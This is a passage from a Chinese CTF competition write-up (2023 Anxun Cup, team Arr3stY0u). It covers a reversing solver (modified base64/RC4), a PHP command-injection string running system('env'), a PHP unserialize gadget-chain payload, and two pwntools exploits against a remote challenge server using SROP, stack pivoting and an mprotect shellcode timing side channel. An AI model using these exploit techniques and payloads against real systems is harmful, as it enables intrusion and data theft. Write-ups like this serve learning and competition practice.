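         * res[j + 2] = a[2] << 6 | a[3]; */
    }

    switch (flag) {
    case 1:   /* "==": one byte left in the last group */
        a[0] = findPos(base64_map, code[len - 4]);
        a[1] = findPos(base64_map, code[len - 3]);
        res[str_len - 1] = a[0] | ((a[1] & 0x3) << 6);
        break;
    case 2:   /* "=": two bytes left in the last group */
        a[0] = findPos(base64_map, code[len - 4]);
        a[1] = findPos(base64_map, code[len - 3]);
        a[2] = findPos(base64_map, code[len - 2]);
        res[str_len - 2] = a[0] | ((a[1] & 0x3) << 6);
        res[str_len - 1] = ((a[1] & 0x3c) >> 2) | ((a[2] & 0xf) << 4);
        break;
    default:
        break;
    }

    /* The page's copy shows '' here, which does not compile; '\0' terminates
     * the buffer so printf("%s") in main() stops at the decoded length. */
    res[str_len] = '\0';
    return res;
}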
/* RC4 state.  The challenge shrank the permutation from 256 entries to
 * sboxSize (64), so every index below is reduced modulo sboxSize. */
unsigned char sbox[sboxSize] = { 0 };

/* Exchange the bytes at a and b. */
void swap(unsigned char* a, unsigned char* b)
{
    unsigned char t = *a;
    *a = *b;
    *b = t;
}

/* Key scheduling: start from the identity permutation, repeat the key over
 * a temporary table of sboxSize bytes, then run the usual RC4 shuffle. */
void init_sbox(unsigned char key[], int keyLen)
{
    unsigned char Ttable[sboxSize] = { 0 };
    int i, j;

    for (i = 0; i < sboxSize; i++) {
        sbox[i] = (unsigned char)i;
        Ttable[i] = key[i % keyLen];
    }
    for (i = 0, j = 0; i < sboxSize; i++) {
        j = (j + sbox[i] + Ttable[i]) % sboxSize;
        swap(&sbox[i], &sbox[j]);
    }
}

/* Modified RC4 keystream applied in place (encryption == decryption).
 * The keystream byte is not sbox[(sbox[i] + sbox[j]) % sboxSize] as in RC4
 * but (i ^ j) & sbox[((i ^ j) + sbox[i] + sbox[j]) % sboxSize]. */
void RC4_enc_dec(unsigned char data[], int dataLen, unsigned char key[], int keyLen)
{
    unsigned char i = 0, j = 0;
    unsigned int pos;

    init_sbox(key, keyLen);
    for (pos = 0; pos < dataLen; pos++) {
        i = (i + 1) % sboxSize;
        j = (j + sbox[i]) % sboxSize;
        swap(&sbox[i], &sbox[j]);
        unsigned char ks = (i ^ j) & sbox[((i ^ j) + sbox[i] + sbox[j]) % sboxSize];
        data[pos] ^= ks;
    }
}
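/* Recover the flag: undo the modified base64, then the modified RC4 with the
 * key "the_key_" found in the binary, and print the result. */
int main() {
    unsigned char BaseData[] = "6zviISn2McHsa4b108v29tbKMtQQXQHA+2+sTYLlg9v2Q2Pq8SP24Uw=";
    unsigned char* result = base64_decode(BaseData);   /* modified base64 */
    if (result == NULL)
        return 1;
    /* 41 = decoded length of the 56-character input ending in a single '='. */
    RC4_enc_dec(result, 41, (unsigned char*)"the_key_", 8);   /* modified RC4 */
    printf("%s", result);
    free(result);   /* base64_decode() hands back a malloc()ed buffer */
    return 0;
}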

WEB

what’s my name

2023 第六届安洵杯 writeup by Arr3stY0u

?d0g3=’”]);}system(‘env’);;;;/*include&name=%00lambda_32

跑32次

easy_unserialize

<?php
// Gadget classes mirrored from the challenge source.  The private properties
// (gg2, md5) and their defaults are included so the serialized string carries
// them (they show up as %00Luck%00md5 etc. in the payload below).
class Good{
    public $g1;
    private $gg2='*&';
}
class Luck{
    public $l1;
    public $ll2;
    private $md5=1131911;
    public $lll3;
}
class To{
    public $t1;
    public $tt2;
    public $arg1 = array("guangji"=>1);
}
class You{
    public $y1;
}
class Flag{ }

// Innermost object: a Flag with two dynamic properties; the one named
// SplFileObject holds the target path.  How the target consumes it is not
// shown on this page.
// NOTE(review): dynamic properties on classes without #[AllowDynamicProperties]
// are deprecated from PHP 8.2; serialize() still emits them.
$F = new Flag;
$F->SplFileObject = "/FfffLlllLaAaaggGgGg";
$F->b = "";
// Chain, innermost to outermost:
//   Luck->l1 = Flag; To->t1 = that Luck; Luck->ll2 = that To; To->tt2 = that
//   Luck; Good->g1 = that To; Luck->lll3 = that Good; You->y1 = that Luck.
$l2 = new Luck;
$l2->l1 = $F;
$t2 = new To;
$t2->t1 = $l2;
$l = new Luck;
$l->ll2 = $t2;
$t = new To;
$t->tt2 = $l;
$g = new Good;
$g->g1 = $t;
$r = new Luck;
$r->lll3 = $g;
$q = new You;
$q->y1 = $r;
// URL-encode so the NUL bytes marking private properties survive the query string.
echo urlencode(serialize($q));

payload

D0g3=O%3A3%3A%22You%22%3A1%3A%7Bs%3A2%3A%22y1%22%3BO%3A4%3A%22Luck%22%3A4%3A%7Bs%3A2%3A%22l1%22%3BN%3Bs%3A3%3A%22ll2%22%3BN%3Bs%3A9%3A%22%00Luck%00md5%22%3Bi%3A1131911%3Bs%3A4%3A%22lll3%22%3BO%3A4%3A%22Good%22%3A2%3A%7Bs%3A2%3A%22g1%22%3BO%3A2%3A%22To%22%3A3%3A%7Bs%3A2%3A%22t1%22%3BN%3Bs%3A3%3A%22tt2%22%3BO%3A4%3A%22Luck%22%3A4%3A%7Bs%3A2%3A%22l1%22%3BN%3Bs%3A3%3A%22ll2%22%3BO%3A2%3A%22To%22%3A3%3A%7Bs%3A2%3A%22t1%22%3BO%3A4%3A%22Luck%22%3A4%3A%7Bs%3A2%3A%22l1%22%3BO%3A4%3A%22Flag%22%3A2%3A%7Bs%3A13%3A%22SplFileObject%22%3Bs%3A20%3A%22%2FFfffLlllLaAaaggGgGg%22%3Bs%3A1%3A%22b%22%3Bs%3A0%3A%22%22%3B%7Ds%3A3%3A%22ll2%22%3BN%3Bs%3A9%3A%22%00Luck%00md5%22%3Bi%3A1131911%3Bs%3A4%3A%22lll3%22%3BN%3B%7Ds%3A3%3A%22tt2%22%3BN%3Bs%3A4%3A%22arg1%22%3Ba%3A1%3A%7Bs%3A7%3A%22guangji%22%3Bi%3A1%3B%7D%7Ds%3A9%3A%22%00Luck%00md5%22%3Bi%3A1131911%3Bs%3A4%3A%22lll3%22%3BN%3B%7Ds%3A4%3A%22arg1%22%3Ba%3A1%3A%7Bs%3A7%3A%22guangji%22%3Bi%3A1%3B%7D%7Ds%3A9%3A%22%00Good%00gg2%22%3Bs%3A2%3A%22%2A%26%22%3B%7D%7D%7D

PWN

seccomp

2023 第六届安洵杯 writeup by Arr3stY0u

一个输入长gadget的全局变量,一次溢出机会

2023 第六届安洵杯 writeup by Arr3stY0u

有沙箱,但是可以orw读出flag,借助一部分srop的手法加以利用

from pwn import *
import time
import subprocess

context(arch='amd64',os='linux',log_level='debug')
command = "ls -l"   # unused, as are the time/subprocess imports
#p = process('./chall')
p=remote("47.108.206.43",22039)
elf = ELF("./chall")
#libc = ELF("./libc-2.23.so")
#libc = ELF("./libc.so.6")
#context(arch="amd64",os="linux",log_level="debug")


# pwntools shorthands from the author's template; only sla() is used below.
def s(a) : p.send(a)
def sa(a, b) : p.sendafter(a, b)
def sl(a) : p.sendline(a)
def sla(a, b) : p.sendlineafter(a, b)
def r() : return p.recv()
def pr() : print(p.recv())
def rl(a) : return p.recvuntil(a)
def inter() : p.interactive()
# NOTE(review): b'x7f' / b'x00' here and in the payload below look like
# b'\x7f' / b'\x00' with the backslashes lost in transcription; kept verbatim.
def get_addr(): return u64(p.recvuntil(b'x7f')[-6:].ljust(8, b'x00'))


#752
# Addresses in ./chall: a leave;ret gadget and the two gadgets (sig, sy) that
# the frames below are chained through.  Their contents are not shown on the
# page; the layout assumes sig;sy performs a sigreturn with the following
# frame.
leave = 0x40136c
sig = 0x0000000000401194
sy = 0x000000000040118a
#gdb.attach(p)

# Three sigreturn frames laid out in the global buffer at 0x404060.  Each has
# rip set to the PLT stub of the syscall() wrapper, so rdi carries the syscall
# number (2 open, 0 read, 1 write) and rsi/rdx/rcx its arguments; rsp points
# at the next sig/sy pair so the frames run one after another.  The seccomp
# policy leaves open/read/write usable, which is what makes this read-out
# possible.
opena = SigreturnFrame()
opena.rax = 0
opena.rdi = 2
opena.rsi = 0x404060
opena.rdx = 0
opena.rcx = 0
opena.rip = elf.plt['syscall']
opena.rbp = 0x404060 + 0x20
opena.rsp = 0x404170
read1 = SigreturnFrame()
read1.rax = 0
read1.rdi = 0
read1.rsi = 3
read1.rdx = 0x404560
read1.rcx = 0x30
read1.rip = elf.plt['syscall']
read1.rbp = 0x404060 + 0x20
read1.rsp = 0x404170+(0x404170-0x404060)-8
write = SigreturnFrame()
write.rax = 0
write.rdi = 1
write.rsi = 1
write.rdx = 0x404560
write.rcx = 0x30
write.rip = elf.plt['syscall']
write.rbp = 0x404060 + 0x20
write.rsp = 0x404170+(0x404170-0x404060)
# First input: the path string (opena.rsi points at it) followed by the frames.
sla("easyhack",b'./flagx00x00'+p64(sig)+p64(sy)+flat(opena)+p64(sig)+p64(sy)+flat(read1)+p64(sig)+p64(sy)+flat(write))
# Second input: the one overflow -- 0x2a bytes of filler, saved rbp pointing
# at the global buffer, and leave;ret to pivot the stack onto it.
sla("SUID?",b'a'*(0x2a)+p64(0x404060)+p64(leave))
p.interactive()

side_channel,initiate!

from pwn import *
context.log_level = 'ERROR'
context.terminal = ['wt.exe', 'wsl.exe', 'bash', '-c']
context.binary = './chall'
binary = context.binary

# NOTE(review): `args.REMOTE or 1` is truthy when REMOTE is unset (the `or 1`)
# and when it is set to any non-empty string, so test() below never takes its
# local process() branch.
REMOTE = args.REMOTE or 1

syscall = 0x40118A
bss = 0x404060
FLAG = '/flag'

# Shellcode run once the mprotect frame in test() has made the .bss page
# executable: open(FLAG) -> fd 3, read 0x100 bytes of it to bss+0xE00
# (0x404E60), then read two bytes (index, guess) from stdin into 0x404F60 and
# compare guess with flag[index].  When guess >= flag byte the code blocks on
# a one-byte read (L_HANG); otherwise it exits at once.  The caller measures
# that difference.
code = shellcraft.open(FLAG, 'O_RDONLY', 'rdx')
code += shellcraft.read(3, bss+0xE00, 0x100)
code += '''
    xor eax, eax
    mov rdi, 0
    mov rsi, 0x404F60
    mov rdx, 2
    syscall

    movzx rcx, byte ptr [0x404F60]
    movzx rax, byte ptr [0x404F61]
    movzx rbx, byte ptr [0x404E60+rcx]
    cmp rax, rbx
    jge L_HANG
    jmp L_EXIT
L_HANG:
    xor eax, eax
    mov rdi, 0
    mov rsi, 0x404F60
    mov rdx, 1
    syscall
L_EXIT:
'''
code += shellcraft.exit(0)

shellcode = asm(code)
def test(idx, ch):
    """Probe one flag byte over a fresh connection.

    Returns True when the remote needed more than 0.28 s to go quiet after
    receiving (idx, ch), i.e. the shellcode hung, which happens when
    ch >= flag[idx]; False when it exited promptly.
    """
    if REMOTE:
        p = remote('47.108.206.43', 37910)
    else:
        p = process('./chall')

    # Stage 1: the shellcode padded to the 0x100-byte buffer, 8 bytes over
    # the saved rbp, the addresses 0x401193 and the syscall gadget (their
    # contents are not shown on the page), then a sigreturn frame.
    pay1 = shellcode
    pay1 = pay1.ljust(0x100, b'A')
    pay1 += b'A'*0x8
    pay1 += p64(0x401193)
    pay1 += p64(syscall)

    # The frame calls mprotect(0x404000, 0x1000, 7) -- 7 is
    # PROT_READ|PROT_WRITE|PROT_EXEC -- and resumes at 0x401186 with rsp
    # inside .bss.
    frame = SigreturnFrame()
    frame.rax = constants.SYS_mprotect
    frame.rdi = 0x404000
    frame.rsi = 0x1000
    frame.rdx = 7
    frame.rsp = bss+0x210
    frame.rip = 0x401186
    pay1 += bytes(frame)
    pay1 += p64(0x404060)

    # gdb.attach(p, 'b *0x40118E')
    # sleep(1)

    # NOTE(review): b"easyhackn" looks like b"easyhack\n" with the backslash
    # lost in transcription; kept verbatim.
    p.sendafter(b"easyhackn", pay1)
    p.recvline()
    # Stage 2: 0x2A bytes of filler, saved rbp = bss+0x100, and a leave;ret
    # gadget to pivot onto the .bss buffer (the original comment says "level").
    payload = b'A'*0x2A
    payload += p64(bss+0x100)
    payload += p64(0x401441) # leave; ret
    p.send(payload)
    p.send(p8(idx)+bytes([ch]))
    # Timing side channel: clean(0.3) waits up to 0.3 s for output, so a hung
    # process makes the call run to its timeout.
    t = time.time()
    p.clean(0.3)
    t = time.time()-t
    p.close()
    print(t)
    return t > 0.28

# Binary-search each of the 36 flag characters over 0x2D..0x66 ('-'..'f',
# which covers hex digits and the dash).  A hang (test() True) means the
# guess is >= the real byte, so the upper bound moves down.  Pre-fill `flag`
# with already-recovered characters to resume an interrupted run.
flag = ""
for i in range(len(flag), 36):
    l = 0x2D
    r = 0x66
    while l < r:
        mid = (l+r)//2
        res = test(i, mid)
        if res:
            r = mid
        else:
            l = mid+1
        print(l, r, chr(l), chr(r))
    flag += chr(l)
    print(flag)

print('flag{'+flag+'}')

FOOTER

团队简介:

      山海关安全团队(www.shg-sec.com)是一支专注网络安全的实战型团队,队员均来自国内外各大高校与企事业单位,主要从事漏洞挖掘、情报分析、反涉网犯罪研究。Arr3stY0u战队与W4ntY0u预备队隶属于CTF组,我们积极参与各大网络安全竞赛,欢迎你的加入~

原文始发于微信公众号(山海之关):2023 第六届安洵杯 writeup by Arr3stY0u
